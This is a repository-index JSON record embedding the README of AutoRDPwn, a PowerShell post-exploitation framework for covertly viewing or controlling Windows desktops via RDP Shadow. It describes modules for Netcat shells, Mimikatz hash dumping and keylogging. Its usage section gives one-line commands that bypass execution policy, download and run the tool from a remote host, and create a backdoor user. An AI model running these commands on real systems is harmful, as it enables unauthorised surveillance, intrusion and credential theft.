{"id":13510659,"url":"https://github.com/JoelGMSec/AutoRDPwn","last_synced_at":"2025-03-30T16:34:36.936Z","repository":{"id":40614114,"uuid":"142743318","full_name":"JoelGMSec/AutoRDPwn","owner":"JoelGMSec","description":"The Shadow Attack Framework","archived":false,"fork":false,"pushed_at":"2022-09-04T20:44:27.000Z","size":17630,"stargazers_count":1082,"open_issues_count":0,"forks_count":506,"subscribers_count":52,"default_branch":"master","last_synced_at":"2024-10-18T15:29:23.166Z","etag":null,"topics":["attack","pentesting","powershell","rdp","red-team","shadow","windows"],"latest_commit_sha":null,"homepage":"https://darkbyte.net","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/JoelGMSec.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null},"funding":{"github":"JoelGMSec","patreon":null,"open_collective":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":["https://buymeacoff.ee/JoelGMSec","https://darkbyte.net/shop"]}},"created_at":"2018-07-29T08:22:20.000Z","updated_at":"2024-10-16T20:38:42.000Z","dependencies_parsed_at":"2022-07-14T04:00:39.938Z","dependency_job_id":null,"html_url":"https://github.com/JoelGMSec/AutoRDPwn","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JoelGMSec%2FAutoRDPwn","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JoelGMSec%2FAutoRDPwn/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JoelGMSec%2FAutoRDPwn/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JoelGMSec%2FAutoRDPwn/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/JoelGMSec","download_url":"https://codeload.github.com/JoelGMSec/AutoRDPwn/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222566739,"owners_count":17004237,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["attack","pentesting","powershell","rdp","red-team","shadow","windows"],"created_at":"2024-08-01T02:01:48.751Z","updated_at":"2024-11-01T11:31:01.090Z","avatar_url":"https://github.com/JoelGMSec.png","language":"PowerShell","funding_links":["https://github.com/sponsors/JoelGMSec","https://buymeacoff.ee/JoelGMSec","https://darkbyte.net/shop","https://www.buymeacoffee.com/joelgmsec"],"categories":["PowerShell","PowerShell (153)","windows"],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\u003cimg width=450 alt=\"AutoRDPwn\" src=\"https://raw.githubusercontent.com/JoelGMSec/AutoRDPwn/master/Resources/Design/AutoRDPwn.png\"\u003e\u003c/p\u003e\n\n**AutoRDPwn** is a post-exploitation framework created in Powershell, designed primarily to automate the **Shadow** attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself.\n\nThanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this, Through a completely intuitive menu in seven different languages.\n\nAdditionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.\n\n\n# Requirements\nPowershell 4.0 or higher\n\n\n# Changes\n## Version 5.1\n• Many bugs fixed\n\n• Aesthetic improvements and improved waiting times\n\n• Proxy-Aware connection through system settings\n\n• It is now possible to use the offline tool by downloading the .zip file\n\n• Language auto-detection by pressing the enter key\n\n• Invoke-DCOM has been replaced by SharpRDP\n\n• PowerUp has been replaced by Invoke-PrivescCheck\n\n• Creation of the automatic cleaning subroutine in the victim\n\n• New module available: SMB Shell encrypted with AES\n\n• New module available: Change user with RunAs\n\n*The rest of the changes can be consulted in the CHANGELOG file\n\n\n# Usage\nThis application can be used locally, remotely or to pivot between teams.\n\nWhen used remotely in a reverse shell, it is necessary to use the following parameters:\n\n| Parameter               | Description                                                                                    | \n| :---------------------- | :--------------------------------------------------------------------------------------------- | \n| **-admin / -noadmin**   | Depending on the permissions we have, we will use one or the other                             |\n| **-nogui**              | This will avoid loading the menu and some colors, guaranteed its functionality                 | \n| **-lang**               | We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese) |\n| **-option**             | As with the menu, we can choose how to launch the attack                                       |\n| **-shadow**             | We will decide if we want to see or control the remote device                                  |\n| **-createuser**         | This parameter is optional, the user AutoRDPwn:AutoRDPwn will be created on the victim machine |\n| **-noclean**            | Disables the process of undoing all changes on the victim computer                             |\n\n**Local execution on one line:**\n```\npowershell -ep bypass \"cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\\AutoRDPwn.ps1\"\n```\n\n**Example of remote execution on a line:**\n```\npowershell -ep bypass \"cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser\"\n```\n\n\n### The detailed guide of use can be found at the following link:\n\nhttps://darkbyte.net/autordpwn-la-guia-definitiva\n\n\n# Screenshots\n![AutoRDPwn1_en](https://raw.githubusercontent.com/JoelGMSec/AutoRDPwn/master/Resources/Screenshots/AutoRDPwn1_en.PNG)\n![AutoRDPwn2_en](https://raw.githubusercontent.com/JoelGMSec/AutoRDPwn/master/Resources/Screenshots/AutoRDPwn2_en.PNG)\n\n\n# License\nThis project is licensed under the GNU 3.0 license - see the LICENSE file for more details.\n\n\n# Credits and Acknowledgments\nThis framework has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec\n\nSome modules use third-party code, scripts, and tools, particularly:\n\n• **Chachi-Enumerator** by *Luis Vacas* --\u003e https://github.com/Hackplayers/PsCabesha-tools\n\n• **Invoke-Phant0m** by *Halil Dalabasmaz* --\u003e https://github.com/hlldz/Invoke-Phant0m\n\n• **Invoke-PowerShellTcp** by *Nikhil \"SamratAshok\" Mittal* --\u003e https://github.com/samratashok/nishang\n\n• **Invoke-TheHash** by *Kevin Robertson* --\u003e https://github.com/Kevin-Robertson/Invoke-TheHash\n\n• **Mimikatz** by *Benjamin Delpy* --\u003e https://github.com/gentilkiwi/mimikatz\n\n• **PsExec** by *Mark Russinovich* --\u003e https://docs.microsoft.com/en-us/sysinternals/downloads/psexec\n\n• **RDP Wrapper** by *Stas'M Corp.* --\u003e https://github.com/stascorp/rdpwrap\n\n• **SharpRDP** by *Steven F* --\u003e https://github.com/0xthirteen/SharpRDP\n\nAnd many more, that do not fit here.. Thanks to all of them and their excellent work.\n\n\n# Contact\nThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.\n\nFor more information, you can find me on Twitter as [@JoelGMSec](https://twitter.com/JoelGMSec) and on my blog [darkbyte.net](https://darkbyte.net).\n\n\n# Support\nYou can support my work buying me a coffee:\n\n[\u003cimg width=250 alt=\"buymeacoffe\" src=\"https://cdn.buymeacoffee.com/buttons/v2/default-blue.png\"\u003e](https://www.buymeacoffee.com/joelgmsec)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FJoelGMSec%2FAutoRDPwn","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FJoelGMSec%2FAutoRDPwn","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FJoelGMSec%2FAutoRDPwn/lists"}